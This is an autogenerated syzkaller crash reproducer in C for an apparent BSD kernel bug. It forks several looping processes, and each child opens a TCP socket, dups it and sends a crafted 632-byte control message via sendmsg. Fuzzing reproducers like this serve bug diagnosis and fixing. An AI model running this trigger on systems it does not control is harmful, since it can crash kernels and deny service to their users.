// https://syzkaller.appspot.com/bug?id=910c84220f7ed55f124919cf54980c617e5fed76
// autogenerated by syzkaller (https://github.com/google/syzkaller)

#define _GNU_SOURCE

#include <endian.h>
#include <pwd.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

unsigned long long procid;

static void kill_and_wait(int pid, int* status)
{
  kill(pid, SIGKILL);
  while (waitpid(-1, status, 0) != pid) {
  }
}

static void sleep_ms(uint64_t ms)
{
  usleep(ms * 1000);
}

static uint64_t current_time_ms(void)
{
  struct timespec ts;
  if (clock_gettime(CLOCK_MONOTONIC, &ts))
    exit(1);
  return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;
}

static void execute_one(void);

#define WAIT_FLAGS 0

static void loop(void)
{
  int iter;
  for (iter = 0;; iter++) {
    int pid = fork();
    if (pid < 0)
      exit(1);
    if (pid == 0) {
      execute_one();
      exit(0);
    }
    int status = 0;
    uint64_t start = current_time_ms();
    for (;;) {
      if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid)
        break;
      sleep_ms(1);
      if (current_time_ms() - start < 5 * 1000)
        continue;
      kill_and_wait(pid, &status);
      break;
    }
  }
}

#ifndef SYS_dup
#define SYS_dup 41
#endif
#ifndef SYS_mmap
#define SYS_mmap 197
#endif
#ifndef SYS_sendmsg
#define SYS_sendmsg 28
#endif
#ifndef SYS_socket
#define SYS_socket 394
#endif

uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};

void execute_one(void)
{
  intptr_t res = 0;
  res = syscall(SYS_socket, 2ul, 1ul, 0);
  if (res != -1)
    r[0] = res;
  res = syscall(SYS_dup, r[0]);
  if (res != -1)
    r[1] = res;
  *(uint64_t*)0x20000180 = 0;
  *(uint32_t*)0x20000188 = 0;
  *(uint64_t*)0x20000190 = 0;
  *(uint64_t*)0x20000198 = 0;
  *(uint64_t*)0x200001a0 = 0x200002c0;
  memcpy(
      (void*)0x200002c0,
      "\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xe8\xd3"
      "\x19\x88\x3e\x6e\x6d\x01\x7f\xe3\xfc\xb8\xbd\xfe\x3d\x79\x20\x0c\xec\x85"
      "\x90\xae\x00\x00\x88\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x08"
      "\x00\x00\xf8\xfc\x5a\x6d\x8e\x53\xb2\x12\xf6\xd2\x59\x6a\x71\x47\x14\x16"
      "\x6b\xff\x90\x61\x50\x4d\x76\x33\xcd\xe6\xe2\x9c\x4b\x43\x91\xb6\x42\xfb"
      "\x3d\xcd\x18\x14\xfb\x59\x08\x31\x6e\x89\x8d\xb5\xea\x9e\x1f\x89\x13\x85"
      "\xc7\x22\x9b\xbb\x8c\x2b\xeb\xdc\x35\x79\xcb\x29\x85\x68\x65\xb1\x33\xad"
      "\xc5\xc9\xd5\x27\xaf\x82\xfe\xf5\x1e\x92\x48\xd2\x24\xda\x7d\xf8\x03\xc7"
      "\x20\xb7\x3a\xd6\x70\x2f\x5b\x67\x2a\xf3\xd8\xfb\x37\xa1\xdf\x05\x4b\x47"
      "\x06\x66\x16\x03\xd9\x48\x70\xfc\xac\x1d\x5a\xe5\xa8\x00\x20\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x23\x9f\x97\x90\x76\xb1"
      "\xd0\x9a\x1e\x9b\x89\x20\x2f\x60\x5b\x63\xd8\x00\x00\x00\x00\x00\x00\x00"
      "\xff\xff\x00\x00\x07\x00\x00\x00\x9a\x55\xcc\xc3\xbe\x5a\x62\x4f\x89\x0d"
      "\x79\xa7\x63\x50\x38\x52\xc2\xb4\x43\x11\xff\x5e\xd7\x15\xcf\x8e\xcc\x7b"
      "\xd7\xf4\xd4\x88\x9e\x74\xd6\x05\x59\x18\xe1\x94\x7a\xe5\x5e\x17\x97\xed"
      "\xf0\x52\xc7\x24\x37\x33\x58\x23\xbd\x9a\x62\x3a\xf1\xc2\x6a\xd3\x70\x82"
      "\xdb\x0b\xfb\xed\x7a\x26\xfd\x6d\xdb\x51\x1f\x31\x3a\x94\x89\x53\xc8\x95"
      "\x79\x28\x82\x47\xf2\xb0\x80\xbb\x17\xcc\x48\x0d\xa8\x58\x63\x06\x4c\x4d"
      "\x16\xfc\x19\xb9\x78\x57\x7d\xb9\xc5\xec\x86\x4f\xa0\xf2\x6f\x62\x96\x0f"
      "\x69\x29\xe5\x72\xac\xf8\x11\x2f\xa2\xa8\xa7\xc1\x4f\x28\x7a\x34\xfd\x52"
      "\x4c\x60\x8d\x27\x22\x12\x32\xd0\x10\x68\x0a\xc5\xe8\x86\x79\xca\x20\x7d"
      "\x4d\x15\xbb\x3e\x4d\x34\x5a\x5b\x39\x3b\x97\x6a\x6b\xa2\x62\x2a\xf5\xd9"
      "\x76\x51\xfc\xd3\x10\xca\xf3\x60\xe1\x40\x2d\x5a\x46\xab\xc7\x11\x46\x7c"
      "\x6b\xff\x1f\xd8\x45\xec\x15\x60\x77\xc4\xd0\x00\x00\x00\x00\x00\x00\x00"
      "\xff\xff\x00\x00\x00\x00\x00\x00\x4c\x4e\xf2\xb3\xcd\x05\xad\x8a\xe0\x7e"
      "\x2c\xba\x4b\x89\xa5\x84\xd4\x21\x76\xb9\xfd\x02\xf3\x21\x49\x33\xec\xc8"
      "\x10\x46\xb7\x82\x28\x70\xf1\xeb\x21\x66\x54\x89\x12\xe8\xb8\x0d\xb9\xfc"
      "\xa9\x2b\x0a\xd7\x04\x09\x8d\x4a\xa2\xb5\x9e\x0e\xea\x24\x4a\x2b\x26\xf7"
      "\xa9\xe8\xa4\x1e\x8f\xd4\x76\x95\x28\x1e\xfb\x7e\x65\x83\x33\x51\xaa\xc2"
      "\xfa\x4b\x0c\x11\xf0\x53\x1c\x67\x8a\xf5\x74\x83\x10\xa4\xef\xba\xef\x49"
      "\x2c\x5b\x17\x13\x02\x8e\x95\x8b\x7b\x85\x42\x86\x3c\xb1\x51\x55\x68\x63"
      "\x0e\x9a\x47\x26\x18\xec\xc7\xfa\x88\x80\x47\xea\x23\x0c\x67\x86\x60\x3b"
      "\xcd\x71\xf8\x28\xd5\xd6\x72\x19\x7c\xaa\xf4\x77\x48\xe1\x75\xd9\xb3\xc2"
      "\x5c\x2e\x2a\x60\xf8\x6e\x55\xd4\x30\xf2\x47\xa8\xf3\x55\xbc\x90\xaa\x5d"
      "\x82\x37\xdd\xe5\x8e\x25\xd9\x84\x02\xab\xba\xa3\x65\x4e\x00\x00\x00\x00"
      "\x00\x00",
      632);
  *(uint64_t*)0x200001a8 = 0x278;
  *(uint32_t*)0x200001b0 = 0;
  syscall(SYS_sendmsg, r[1], 0x20000180ul, 0xful);
}
int main(void)
{
  syscall(SYS_mmap, 0x20000000ul, 0x1000000ul, 3ul, 0x1012ul, -1, 0ul, 0ul);
  for (procid = 0; procid < 6; procid++) {
    if (fork() == 0) {
      loop();
    }
  }
  sleep(1000000);
  return 0;
}